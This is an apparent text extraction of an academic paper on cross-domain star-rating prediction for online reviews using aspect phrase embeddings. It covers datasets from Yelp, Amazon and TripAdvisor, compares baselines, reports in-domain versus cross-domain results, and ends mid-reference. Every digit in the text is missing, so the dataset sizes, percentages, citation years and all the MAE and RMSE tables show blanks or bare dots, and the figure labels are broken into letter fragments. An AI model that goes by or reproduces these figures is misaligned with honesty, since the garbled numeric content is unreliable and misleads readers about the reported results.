sentences or segments of a review, which are then aggregated to determine the overall review rating. despite the increasing volume of research in review rating prediction, which we discuss in what follows, research in cross-domain review rating prediction is still unstudied. this is particularly important for less popular review domains where labelled data is scarce and hence one may need to exploit labelled data from a different, more popular domain for training a classifier. jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. review rating prediction has commonly been regarded as a classification task, but also as a regression task on a few occasions (li et al., ; pang & lee, ; mousavizadeh, koohikamali & salehan, ). the text of the review is the input that is consistently used by most existing works (qu, ifrim & weikum, ; leung, chan & chung, ; mousavizadeh, koohikamali & salehan, ), however many of them also incorporate other features extracted from the product being reviewed or from the user writing the review (qu, ifrim & weikum, ). ganu, elhadad & marian ( ) improved the review rating prediction accuracy by implementing new ad-hoc and regression-based recommendation measures, where the aspect of user reviews is considered; their study was however limited to only restaurant reviews and other domains were not studied. a novel kind of bag-of-opinions representation (qu, ifrim & weikum, ) was proposed and each opinion consists of three parts, namely a root term, a set of modifier terms from the same sentence, and one or more negation terms. this approach shows a better performance than prior state-of-the-art techniques for review rating prediction. datasets including three review domains were used for their experiments, however they ran separate experiments for each domain and did not consider the case of domains lacking training data. similarly, wang, lu & zhai ( ) performed experiments predicting the ratings of hotel reviews, using a regression model that looked at different aspects discussed in a review, with the intuition that different aspects would have different levels of importance towards determining the rating. recent years have seen an active interest in researching approaches to review rating prediction but are still limited to popular domains and do not consider the case of domains lacking training data. in a number of cases, features extracted from products and users are being used (jin et al., ; lei, qian & zhao, ; seo et al., b; wang et al., ), which limits the ability to apply a prediction system to new domains and to unseen products and users. tang et al. ( ) studied different ways of combining features extracted from the review text and the user posting the review. they introduced the user-word composition vector model (uwcvm), which considers the user posting a review to determine the specific use that a user makes of each word. while this is a clever approach to consider differences across users, it also requires observing reviews posted by each user beforehand, and cannot easily generalise to new, unseen users, as well as to new review domains where we lack any information about those users. an approach that predicts review ratings from the review text alone is that by fan & khademi ( ). they performed a study of two kinds of features: bag-of-words representations of reviews, as well as part-of-speech tags of the words in the review. they studied how the top k keywords in a dataset contributed to the performance of the rating prediction system, finding that a multinomial logistic regression classifier using the top keywords performed best. others have used topic modelling techniques like lda or plsa to identify the aspects that users discuss in restaurant reviews; however, they did not study their effectiveness for review rating prediction (titov & mcdonald, ; huang, rogers & joo, ; zhou, wan & xiao, ; vargas & pardo, ). one of the most recent methods by cheng et al. ( ) combines topic modelling with a neural network classifier. the approach, called a ncf, extracts users’ preferences and jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. items’ characteristics on different aspects from reviews. an lda topic modelling layer is used to then generate topic-specific representations of users and items. subsequently, the method uses an attention network which combines these user and item features extracted from reviews. this method is shown to outperform an earlier method by catherine & cohen ( ), called transnet, which uses two convolutional neural networks to learn latent representations of users and items. we will use the approach by cheng et al. ( ), namely a ncf, as a state-of-the-art baseline classifier. in this paper, we propose to perform a textual analysis of reviews that goes beyond the sole exploration of the whole text as a unit. our method also looks at the aspect phrases mentioned in the text, which contain the core opinionated comments. this is the case of good food for a restaurant or comfortable bed for a hotel. while these differ substantially across review domains, we propose to leverage aspect phrase embeddings to achieve representations of aspect phrases to enable generalisation. this allows us to perform cross-domain review rating experiments, where one can build a rating prediction model out of larger training data thanks to leveraging labelled data from other domains. to the best of our knowledge, ours is the first work to perform rating predictions for review domains with scarce training data, such as dentists, as well as the first to propose and test a cross-domain review rating prediction system. datasets to enable our analysis of review rating prediction over different domains, we make use of different datasets, each associated with a different domain. we use three different data sources to generate our datasets: ( ) a publicly available collection of million reviews from yelp (https://www.yelp.com/dataset), ( ) a collection of more than million reviews from amazon provided by mcauley et al. ( ); he & mcauley ( ), and ( ) a collection of more than million reviews retrieved from businesses listed in tripadvisor’s top cities. we filter categories of reviews from these datasets, which gives us different datasets that enable us to experiment with review rating prediction over different types of businesses and products. all of the datasets include both the review text and the review rating in a scale from to . the use of a standardised – rating scale facilitates experimentation of rating prediction systems across domains. table shows the list of datasets we use for our experimentation. our datasets comprise more than million reviews overall, distributed across different types of businesses, where some businesses are far more popular than others. the number of reviews per type of business ranges from million reviews for books to , reviews for dentists, showing a significant imbalance in the size and popularity of different domains. the variability of dataset sizes and popularity of review domains enables our analysis looking at the effect of the availability of large amounts of in-domain data for training. in fig. we show a breakdown of the – star ratings for each dataset. we observe an overall tendency of assigning high ratings across most categories, except in the cases of casinos and resorts, where the ratings are more evenly distributed. most categories show an upwards tendency with higher number of reviews for higher ratings, as is the case with jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.yelp.com/dataset http://dx.doi.org/ . /peerj-cs. table details of the datasets, sorted by number of reviews. the number of reviews that each type of business/product receives varies drastically. business/product source # reviews books amazon , , restaurants tripadvisor , , attractions tripadvisor , , clothing amazon , , homeware amazon , , hotels tripadvisor , , nightlife yelp , events yelp , casinos yelp , hair salons yelp , resorts yelp , dentists yelp , total – , , a ttr ac tio ns b oo ks c as in os c lo th in g d en tis ts e ve nt s h ai r s al on s h om ew ar e h ot el s n ig ht lif e r es or ts r es ta ur an ts stars stars stars stars star figure distributions of star ratings in the datasets. . full-size doi: . /peerjcs. /fig- attractions, books or restaurants. interestingly, in the case of dentists and hair salons, the ratings that prevail are ′s and ′s, showing that users tend to either love or hate these services. methodology one of the key challenges of dealing with reviews pertaining to different domains is that the vocabulary can vary significantly. we can expect that people will express that they like or dislike a product in different ways for different domains. for example, one may make a reference to good food when reviewing a restaurant, a comfortable bed for a hotel, an inspiring novel for a book and a fun party for an event. all of these could be deemed jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. similarly positive for each domain, however without a proper method to capture these semantics, predictions made across domains may not be accurate enough. to tackle this problem, we propose to use aspect phrase embeddings. aspect phrase extraction and representation different review domains tend to have different aspect categories associated with them. while one may care about food quality in restaurants, the focus is instead on the engagement when reviewing a book. even if other aspect categories such as price are more widely generalisable across domains, most aspect categories and associated vocabulary vary across domains. in the first instance, we are interested in capturing those phrases associated with aspect categories, which we refer to aspect phrases. we define aspect phrases as tuples providing opinionated judgement of a particular aspect of a product, e.g., excellent food for restaurants or interesting reading for books. once we have these tuples, in a second step we use word embeddings to achieve a generalisable semantic representation of the aspect phrases. aspect phrase extraction to extract the tuples corresponding to aspect phrases from the reviews, we rely on the assumption that these opinionated tuples will be made of ( ) a sentiment word that judges the object or action concerned and ( ) a non-sentiment word that refers to the object or action being judged. to restrict the context in which a tuple can be observed, we consider segments of the reviews, i.e., sentences or parts of sentences that are independent from each other. we perform the extraction of aspect phrases by following the next steps: . pos tagging: we extract the part-of-speech (pos) tags of all words in the reviews by using nltk’s pos tagger (bird & loper, ), hence labelling each word as a noun, verb, adjective, adverb, etc. . identification of sentiment words: we use the sentiment lexicon generated by hu & liu ( ), which provides a list of over , words associated with positive or negative sentiment. with this list, we tag matching keywords from reviews as being positive or negative. . segmentation of reviews: we break down the reviews into segments. to identify the boundaries of segments, we rely on punctuation signs (, . ; :) and coordinating conjunctions (for, and, nor, but, or, yet, so) as tokens indicating the end of a segment. text at either side of these tokens are separated into different segments. . extraction of aspect phrases: at this stage, we only act within the boundaries of each segment. within each segment, we identify pairs of words made of ( ) a sentiment word labelled as positive or negative and ( ) a word labelled as noun or verb by the pos tagger and identified as a non-sentiment word, i.e., not matching any of the keywords in the sentiment lexicon. each pair of words matching these criteria within a segment is extracted as a tuple pertaining to an aspect phrase. through the process above, we extract aspect phrases for all review domains. table shows the most salient aspect phrases for each of the review domains. we observe that aspect phrases vary substantially across domains, with phrases referring to the ease of use jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table list of most salient aspect phrases for the review categories. category top aspect phrases books (great, book) (good, book) (like, book) (recommend, book) (well, written) restaurants (good, food) (good, was) (delicious, was) (great, food) (good, service) attractions (worth, visit) (beautiful, is) (worth, is) (free, is) (attraction, is) clothing (comfortable, are) (well, made) (worn, have) (perfectly, fit) (love, shoes) homeware (easy, clean) (easy, use) (great, works) (well, works) (stainless, steel) hotels (nice, hotel) (good, hotel) (great, hotel) (recommend, hotel) (clean, was) nightlife (happy, hour) (good, was) (pretty, was) (good, were) (good, food) events (nice, was) (clean, was) (pretty, was) (clean, room) (nice, room) casinos (nice, was) (nice, room) (like, casino) (like, room) (clean, room) hair salons (great, hair) (like, hair) (amazing, hair) (best, hair) (recommend, salon) resorts (grand, mgm) (lazy, river) (nice, was) (nice, room) (like, room) dentists (best, dentist) (wisdom, teeth) (work, done) (clean, office) (recommend, office) for homeware, comfort for clothing, food quality for restaurants or happy hour for nightlife, among others. aspect phrase representation despite the ability of our method above to capture aspect phrases independent of the domain, these still vary in terms of vocabulary. to achieve semantic representations of aspect phrases extracted for different domains, we make use of word vec word embeddings (mikolov et al., ). we train a word embedding model using the million reviews in our datasets. this model is then used to achieve semantic representations of the aspect phrases with the following two variants: • aspect phrase embeddings (ape): we aggregate all the aspect phrases extracted for a review. we generate the embedding vector for each review by adding up the word embeddings for all words included in those phrases. • polarised aspect phrase embeddings (pape): we aggregate the aspect phrases for a review in two separate groups, one containing positive phrases and the other containing negative phrases. following the same method as for aspect phrase embeddings, here we generate a separate embedding representation for each group, which leads to an embedding representation for positive aspect phrases and another embedding jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. representation for negative aspect phrases. we then concatenate both embeddings to get the combined vector. experiment settings cross-validation we perform different sets of experiments for comparing the performance of our rating prediction systems in in-domain and cross-domain settings for different domains. as we are interested in performing -fold cross-validation experiments for both settings, we randomly split the data available for each domain d ∈{ .. } into equally sized folds, f ∈{ .. }. each time one of these folds is considered as the test data, testij, while the training data depends on the setting, i.e., ( ) ∑ ∀f∈{ .. },f =j,d=itraindf for in-domain experiments, and ( ) ∑ ∀d∈{ .. },d =i,f=jtraindf for cross-domain experiments. we ultimately average the performance scores across all folds in each setting. classifiers in setting up the experiments for our analysis, we tested all the classifiers proposed by fan & khademi ( ) and some more, including a multinomial logistic regression, a gaussian naive bayes classifier, support vector machines and random forests. our experiments showed that the multinomial logistic regression was clearly and consistently the best classifier, and hence for the sake of clarity and brevity we report results using this classifier in the paper. features and baselines we implement four different sets of features, which include two baselines and two methods that we propose: • baseline (a ncf): introduced by cheng et al. ( ), a ncf is a model that extracts users’ preferences and items’ characteristics on different aspects from reviews. they introduce an attention network which utilises these user and item features extracted from reviews, which aims to capture the attention that a user pays to each aspect of an item in a review. in the absence of cross-domain rating prediction systems in previous work, we use a ncf as the state-of-the-art rating prediction system to beat. • baseline using word embeddings (w v): we implement a second baseline consisting of a word embedding representation of the entire text of a review by averaging all the embeddings. we use the word embedding model we trained from our review datasets, which serves as a comparable baseline to measure the impact of aspect phrase embeddings on the performance of the rating prediction system. • aspect phrase embeddings (ape): we concatenate the word embedding vectors obtained for the entire texts of reviews with the aspect phrase embeddings, i.e., word embedding representations of the aspect phrases extracted from a review. • polarised aspect phrase embeddings (pape): we concatenate the word embedding vectors obtained for the entire texts of reviews with the polarised aspect phrase embeddings, i.e., a concatenation of the word embedding representations of positive aspect phrases and the word embedding representation of negative aspect phrases. jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. note that baseline methods from more recent works are not directly applicable to our task as they make use of user data, which is not applicable in cross-domain scenarios where users are different across domains and platforms. because our objective is to build a review rating prediction system that would then be applicable to other sources on the web, relying on user metadata is not realistic, given that we often do not know the author of a text on the web or the authors are different from those in the training data. hence, we use the state-of-the-art text-only review rating prediction system by fan & khademi ( ), as well as a baseline using word embeddings, which enables direct comparison with the use of aspect phrase embeddings as additional features. evaluation the review rating prediction task can be considered as a rating task with five different stars from to . as a rating task, we need to consider the proximity between the predicted and reference ratings. for instance, if the true star rating of a review is stars, then the predicted rating of stars will be better than a predicted rating of stars. to account for the difference or error rate between the predicted and reference ratings, we rely on the two metrics widely used in previous rating prediction work (li et al., ): the root mean square error (rmse) (see eq. ( )) and mean absolute error (mae) (see eq. ( )). rmse= √∑n i= (ŷi−ri) n ( ) mae= ∑n i= ∣∣yi−ri∣∣ n ( ) where: n denotes the total number of reviews in the test set. yi is the predicted star rating for the ith review. ri is the real star rating given to the ith review by the user. we report both metrics for all our experiments, to facilitate the comparison for future work. results the results are organised in two parts. first, we present and analyse results for in-domain review rating prediction, where the training and test data belong to the same domain. then, we show and analyse the results for cross-domain review rating prediction, where data from domains that differ from the test set is used for training. a comparison of the performance on both settings enables us to assess the suitability of leveraging a cross-domain classifier as well as the use of aspect phrase embeddings. in-domain review rating prediction tables and show results for in-domain review rating prediction, where the training and test data belong to the same domain. experiments are performed using -fold cross validation within each of the datasets. note that lower scores indicate a smaller amount jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table mae results for in-domain review rating prediction. categories are sorted in descending order by number of reviews, with the most popular review categories at the top of the list. mae a ncf w v ape pape w v + ape w v + pape books . . . . . . restaurants . . . . . . attractions . . . . . . clothing . . . . . . homeware . . . . . . hotels . . . . . . nightlife . . . . . . events . . . . . . casinos . . . . . . hair salons . . . . . . resorts . . . . . . dentists . . . . . . of error and hence better performance. these results show that both ape and pape combined with word embeddings (w v+ape and w v+pape) consistently outperform the sole use of word embeddings (w v). we also observe that the sole use of phrase embeddings (ape and pape) does not suffice to outperform word embeddings, whereas their combination with w v leads to clear improvements in all cases. this proves the importance of phrases, however we also see that using the rest of the text in the review is useful to boost performance. likewise, both of our combining methods clearly outperform the baseline method (a ncf) by cheng et al. ( ), with the exception of attractions when the performance is measured using rmse, which is the only case where the baseline performs better; the combining methods leveraging phrase embeddings are clearly better for the rest of the domains. this emphasises the importance of using word embeddings for capturing semantics of aspect phrases, even when the experiments are within the same domain. a comparison between our two proposed methods using phrase embeddings shows that polarised phrase embeddings outperform phrase embeddings for the most popular review categories, whereas the difference is not so clear for less popular categories. all in all, these results show that the use of either form of phrase embeddings combined with word embeddings leads to improvements in the review rating prediction when the training and test data belong to the same domain. the main goal of our work is however to show their effectiveness on cross-domain review rating prediction, which we discuss in the next section. the in-domain results presented in this section enable us to perform a comparison with the cross-domain results presented next. cross-domain review rating prediction tables and show results for cross-domain review rating prediction. while experiments are also performed using -fold cross-validation, we train the classifier for a particular domain using data from the other datasets, i.e., simulating the scenario where we do not have any labelled data for the target domain. we also include results for the best jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table rmse results for in-domain review rating prediction. categories are sorted in descending or- der by number of reviews, with the most popular review categories at the top of the list. rmse a ncf w v ape pape w v + ape w v + pape books . . . . . . restaurants . . . . . . attractions . . . . . . clothing . . . . . . homeware . . . . . . hotels . . . . . . nightlife . . . . . . events . . . . . . casinos . . . . . . hair salons . . . . . . resorts . . . . . . dentists . . . . . . table mae results for cross-domain review rating prediction. bid, best in-domain. categories are sorted in descending order by number of reviews, with the most popular review categories on top of the list. mae a ncf bid w v ape pape w v + ape w v + pape books . . . . . . . restaurants . . . . . . . attractions . . . . . . . clothing . . . . . . . homeware . . . . . . . hotels . . . . . . . nightlife . . . . . . . events . . . . . . . casinos . . . . . . . hair salons . . . . . . . resorts . . . . . . . dentists . . . . . . . performance for each review category when we train with data from the same domain, which is represented as bid (best in-domain). this enables us to compare whether and the extent to which the use of out-of-domain data for training can help to improve the performance for each review category. results show a remarkable difference between popular and non-popular review categories. for the most popular review categories (books, restaurants, attractions, clothing, homeware, hotels), the best performance is obtained by the best in-domain (bid) classifier, which indicates that for review categories with large amounts of training data, it is better to use in-domain data. however, when we look at the bottom review categories (nightlife, events, casinos, hair salons, resorts, dentists), we observe that the cross-domain jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table rmse results for cross-domain review rating prediction. bid, best in-domain. categories are sorted in descending order by number of reviews, with the most popular review categories on top of the list. rmse a ncf bid w v ape pape w v + ape w v + pape books . . . . . . . restaurants . . . . . . . attractions . . . . . . . clothing . . . . . . . homeware . . . . . . . hotels . . . . . . . nightlife . . . . . . . events . . . . . . . casinos . . . . . . . hair salons . . . . . . . resorts . . . . . . . dentists . . . . . . . classifier leveraging out-of-domain data for training achieves higher performance. while the sole use of word embeddings (w v) leads to improved performance for the least popular categories, the improvement is even better when we incorporate either phrase embeddings or polarised phrase embeddings. the results are also positive for the w v+pape over the w v+ape; even if the results are not better in % of the cases, w v+pape tends to outperform w v+ape in most cases, with just a small difference when ape is better, showing that one can rely on pape for all cases dealing with non-popular domains. our combining methods (w v+ape and w v+pape) also outperform the state-of-the-art baseline a ncf for all of the non-popular review domains, with some variation for the popular review domains. this again reinforces the potential of our methods combining phrase embeddings for cross-domain review rating prediction applied to review domains with little training data available. these experiments show a clear shift in the performance of in-domain classifiers when the amount of training data decreases, encouraging the use of out-of-domain data for training in those cases. likewise, this motivates the use of the cross-domain classifier for new domains where no labelled data is available for training, for instance because reviews are collected from a website where no ratings are given by the user, such as facebook, twitter or comments on blogs. further to this, fig. shows the relative improvements of our w v+pape cross-domain classifier over the a ncf and the bid classifiers, both for the mae and rmse metrics. review domains are sorted by popularity on the x axis, with the least popular domains on the right. the relative improvement on each review domain is represented by the blue line. the line of best fit (in black) shows the overall tendency of our cross-domain classifier to achieve an increasing relative improvement over other methods as the popularity of the review domain and subsequently the amount of in-domain training data increases. this jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . . . . . . . a) mae improvement over a ncf − . − . . . b) mae improvement over best in−domain − . . . . . . c) rmse improvement over a ncf − . − . . . d) rmse improvement over best in−domain figure relative improvement of the w v+pape cross-domain classifier over the a ncf and best in-domain (bid) classifiers. review domains are sorted by popularity on the x axis, with the least pop- ular domains on the right. the relative improvement on each review domain is represented by the blue line. the line of best fit (in black) shows the overall tendency of our cross-domain classifier to achieve an increasing relative improvement over other methods as the popularity of the review domain and subse- quently the amount of in-domain training data increases. full-size doi: . /peerjcs. /fig- reinforces our cross-domain classifier as a suitable alternative to achieve the best results on the least popular domains, outperforming any other in-domain alternative. effect of the size of the training data since cross-domain experiments benefit from larger training sets, we assess the effect of the size of the training data on the performance of the rating prediction system. we evaluate the performance of cross-domain rating prediction by using different percentages of the training data available, ranging from % to %, which we then compare with the best jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table mae results for cross-domain review rating prediction with different percentages of the training data. bid, best in-domain. categories are sorted in descending order by number of reviews, with the most popular review categories on top of the list. mae books . . . . . . . . bid= . restaurants . . . . . . . . bid= . attractions . . . . . . . . bid= . clothing . . . . . . . . bid= . homeware . . . . . . . . bid= . hotels . . . . . . . . bid= . nightlife . . . . . . . . bid= . events . . . . . . . . bid= . casinos . . . . . . . . bid= . hair salons . . . . . . . . bid= . resorts . . . . . . . . bid= . dentists . . . . . . . . bid= . in-domain rating prediction system. the subset of the training data is randomly sampled until the percentage is satisfied. tables and show the results of using different percentages of the training data for the rating prediction based on mae and rmse respectively. results for each review category is compared with the best in-domain (bid) result, and the best results are highlighted in bold, i.e., either the best in-domain when this is the best, or the specific percentages when the cross-domain prediction system performs best. as we observed before, the in-domain prediction system performs better for the top review categories based on popularity, thanks to the availability of more training data. we are particularly interested in seeing how much data we need with the less popular categories for the cross-domain rating prediction systems to perform better than their in-domain counterparts. looking at the least popular review categories, we observe that using only % of the training data suffices in all cases to outperform the best in-domain system, with the percentage dropping up to % for casinos and hair salons and up to % for resorts. note that out of the (up to) million reviews available for cross-domain training, a subset jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table rmse results for cross-domain review rating prediction with different percentages of the training data. bid, best in-domain. categories are sorted in descending order by number of reviews, with the most popular review categories on top of the list. rmse books . . . . . . . . bid= . restaurants . . . . . . . . bid= . attractions . . . . . . . . bid= . clothing . . . . . . . . bid= . homeware . . . . . . . . bid= . hotels . . . . . . . . bid= . nightlife . . . . . . . . bid= . events . . . . . . . . bid= . casinos . . . . . . . . bid= . hair salons . . . . . . . . bid= . resorts . . . . . . . . bid= . dentists . . . . . . . . bid= . of % only represents (up to) . million reviews, which are easy to obtain through online review platforms. we also observe that, while performance keeps improving as we increase the size of the training data, it generally shows a tendency to plateau after % of the reviews are used for training. this reflects that after about . million reviews the system has enough training data and can hardly improve its performance. conclusions in this work we have proposed a novel method that leverages aspect phrase embeddings for predicting the star rating of online reviews, which is applicable in in-domain and cross-domain settings. we have also shown that our cross-domain approach is effective for making predictions in review domains with a paucity of training data, where training data from other domains can be successfully exploited. previous work on review rating prediction had been limited to popular reviews domains, such as restaurants or hotels. our study broadens the findings of previous works by experimenting on different datasets jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. pertaining to different review domains of very different levels of popularity, and collects from different sources including yelp, amazon and tripadvisor. given that some of these review domains have very limited availability of labelled data for training, our aim has been to propose a cross-domain review rating prediction system that would perform well for those non-popular domains. likewise, a cross-domain review rating prediction system can be used to predict ratings of reviews gathered from platforms where users do not assign ratings, such as facebook or twitter. our review rating prediction system leverages both pos taggers and sentiment lexicons to extract aspect phrases from reviews, i.e., phrases referring to different features of a business. to enable generalisation of aspect phrases to different domains, we make use of universal representations using word embeddings; we propose two different models for feature representations, ( ) aspect phrase embeddings (ape), which aggregates all aspect phrases of a review, and ( ) polarised aspect phrase embeddings (pape), which considers positive and negative aspect phrases separately to create an embedding representation for each. we compare our results with those of the best-performing classifier by cheng et al. ( ) and another baseline that uses word embedding representations of the entire review. we developed both in-domain and cross-domain review rating prediction systems following this methodology; this allows us to compare performance on in-domain and cross-domain experiments for different review domains. our experiments show that both of our methods leveraging phrase embeddings lead to improvements over the rest of the baseline methods, both in the in-domain and the cross-domain settings. interestingly, a comparison of results for these two experiment settings shows that performance scores are higher for the in-domain classifier when we make predictions on the most popular domains, however the cross-domain classifier leads to substantial improvements for the least popular domains. our results indicate that a classifier trained from in-domain data is more suitable for popular review domains, whereas unpopular review domains can be improved when out-of-domain data is used for training along with our aspect phrase embedding representation. further looking into the amount of data needed for training a cross-domain rating prediction system, we observe that a small sample of about % of the data available (i.e., fewer than million reviews) for the other domains is enough to outperform baseline methods. our work defines the state-of-the-art and the first approach to cross-domain review rating prediction, expanding the hitherto limited research focusing on in-domain settings for popular domains. research in cross-domain review rating prediction is still in its infancy, and we hope that our work will encourage further research in the task. future work on cross-domain review rating prediction could further focus on the detection of implicit aspect phrases for improving performance, as well as in capturing cultural differences in writing reviews, given that users from different countries may express themselves differently when writing positive or negative reviews. to further test additional methods to cross-domain rating prediction, our plans for future work include testing methods for transfer learning and domain adaptation. jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding the authors received no funding for this work. competing interests arkaitz zubiaga is an academic editor for peerj. author contributions • aiqi jiang and arkaitz zubiaga conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: this github repository is related to the code: https://github.com/sleepingaggie/star- rating-prediction. references bird s, loper e. . nltk: the natural language toolkit. in: proceedings of the acl interactive poster and demonstration sessions. stroudsburg: association for computational linguistics, . catherine r, cohen w. . transnets: learning to transform for recommendation. in: proceedings of the eleventh acm conference on recommender systems. new york: acm, – . cheng z, ding y, he x, zhu l, song x, kankanhalli ms. . a ncf: an adaptive aspect attention model for rating prediction. in: international joint conferences on artificial intelligence. stockholm: ijcai, – . fan m, khademi m. . predicting a business star in yelp from its reviews text alone. arxiv preprint. arxiv: . . ganu g, elhadad n, marian a. . beyond the stars: improving rating predictions using review text content. in: th international workshop on the web and databases, vol. . rhode island: webdb, – . available at http://people.dbmi.columbia.edu/ noemie/papers/webdb .pdf . goss j. . a melting pot of cuisines: examining the relationship between restaurant ethnicities and food safety inspection scores. phd thesis, georgetown university. he r, mcauley j. . ups and downs: modeling the visual evolution of fashion trends with one-class collaborative filtering. in: proceedings of the international conference on world wide web. geneva: international world wide web conferences steering committee, – . available at https://cseweb.ucsd.edu/~jmcauley/pdfs/www a. pdf . jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/sleepingaggie/star-rating-prediction https://github.com/sleepingaggie/star-rating-prediction http://arxiv.org/abs/ . http://people.dbmi.columbia.edu/noemie/papers/webdb .pdf http://people.dbmi.columbia.edu/noemie/papers/webdb .pdf https://cseweb.ucsd.edu/~jmcauley/pdfs/www a.pdf https://cseweb.ucsd.edu/~jmcauley/pdfs/www a.pdf http://dx.doi.org/ . /peerj-cs. hu m, liu b. . mining and summarizing customer reviews. in: proceedings of the acm sigkdd international conference on knowledge discovery and data mining. acm, – . huang j, rogers s, joo e. . improving restaurants by extracting subtopics from yelp reviews. iconference (social media expo). jin z, li q, zeng dd, zhan y, liu r, wang l, ma h. . jointly modeling review content and aspect ratings for review rating prediction. in: proceedings of the th international acm sigir conference on research and development in information retrieval. new york: acm, – . kaplan am, haenlein m. . users of the world, unite! the challenges and opportuni- ties of social media. business horizons ( ): – doi . /j.bushor. . . . laddha a, mukherjee a. . aspect opinion expression and rating predic- tion via lda—crf hybrid. natural language engineering ( ): – doi . /s x. lei x, qian x, zhao g. . rating prediction based on social sentiment from textual reviews. ieee transactions on multimedia ( ): – doi . /tmm. . . leung cw, chan sc, chung f-l. . integrating collaborative filtering and sentiment analysis: a rating inference approach. in: proceedings of the ecai workshop on recommender systems. – . li f, liu n, jin h, zhao k, yang q, zhu x. . incorporating reviewer and product information for review rating prediction. in: proceedings of the international joint conference on artificial intelligence, vol. . – . liu b, zhang l. . a survey of opinion mining and sentiment analysis. in: mining text data. new york: springer, – . mcauley j, targett c, shi q, van den hengel a. . image-based recommendations on styles and substitutes. in: proceedings of the international acm sigir conference on research and development in information retrieval. new york: acm, – . mikolov t, sutskever i, chen k, corrado gs, dean j. . distributed represen- tations of words and phrases and their compositionality. in: advances in neural information processing systems. nevada: nips, – . available at https://papers. nips.cc/paper/ -distributed-representations-of-words-and-phrases-and-their- compositionality.pdf . mousavizadeh m, koohikamali m, salehan m. . the effect of central and peripheral cues on online review helpfulness: a comparison between functional and expressive products. in: proceedings of the international conference on information systems. ning x, yac l, wang x, benatallah b, dong m, zhang s. . rating prediction via generative convolutional neural networks based regression. pattern recognition letters in press. pang b, lee l. . seeing stars: exploiting class relationships for sentiment categoriza- tion with respect to rating scales. in: proceedings of the rd annual meeting of the association for computational linguistics. stroudsburg: association for computational linguistics, – . jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.bushor. . . http://dx.doi.org/ . /s x http://dx.doi.org/ . /tmm. . https://papers.nips.cc/paper/ -distributed-representations-of-words-and-phrases-and-their-compositionality.pdf https://papers.nips.cc/paper/ -distributed-representations-of-words-and-phrases-and-their-compositionality.pdf https://papers.nips.cc/paper/ -distributed-representations-of-words-and-phrases-and-their-compositionality.pdf http://dx.doi.org/ . /peerj-cs. pang b, lee l, vaithyanathan s. . thumbs up?: sentiment classification using machine learning techniques. in: proceedings of the conference on empirical methods in natural language processing. stroudsburg: association for computational linguistics, – . perrin a. . social media usage: – . technical report. pew research center. poria s, cambria e, hazarika d, majumder n, zadeh a, morency l-p. . context- dependent sentiment analysis in user-generated videos. in: proceedings of the th annual meeting of the association for computational linguistics (volume : long papers). – . qu l, ifrim g, weikum g. . the bag-of-opinions method for review rating predic- tion from sparse text patterns. in: proceedings of the rd international conference on computational linguistics. association for computational linguistics, – . quan-haase a, young al. . uses and gratifications of social media: a comparison of facebook and instant messaging. bulletin of science, technology & society ( ): – doi . / . salehan m, kim dj. . predicting the performance of online consumer reviews: a sentiment mining approach to big data analytics. decision support systems : – doi . /j.dss. . . . salehan m, zhang s, aghakhani n. . a recommender system for restaurant reviews based on consumer segment. in: proceedings of the americas conference on information systems. seo s, huang j, yang h, liu y. a. interpretable convolutional neural networks with dual local and global attention for review rating prediction. in: proceedings of the eleventh acm conference on recommender systems. new york: acm, – . seo s, huang j, yang h, liu y. b. representation learning of users and items for review rating prediction using attention-based convolutional neural network. in: rd international workshop on machine learning methods for recommender systems (mlrec)(sdm ). sparks ba, browning v. . the impact of online reviews on hotel booking intentions and perception of trust. tourism management ( ): – doi . /j.tourman. . . . taboada m, brooke j, tofiloski m, voll k, stede m. . lexicon-based methods for sentiment analysis. computational linguistics ( ): – doi . /coli_a_ . tang d, qin b, liu t, yang y. . user modeling with neural network for review rating prediction. in: proceedings of ijcai. – . titov i, mcdonald r. . modeling online reviews with multi-grain topic models. in: proceedings of the th international conference on world wide web. new york: acm, – . tripathy a, agrawal a, rath sk. . classification of sentiment reviews using n- gram machine learning approach. expert systems with applications : – doi . /j.eswa. . . . jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . /j.dss. . . http://dx.doi.org/ . /j.tourman. . . http://dx.doi.org/ . /coli_a_ http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /peerj-cs. vargas fa, pardo tas. . aspect clustering methods for sentiment analysis. in: international conference on computational processing of the portuguese language. new york: springer, – . wang b, chen b, ma l, zhou g. . user-personalized review rating prediction method based on review text content and user-item rating matrix. information ( ): . wang y, huang m, 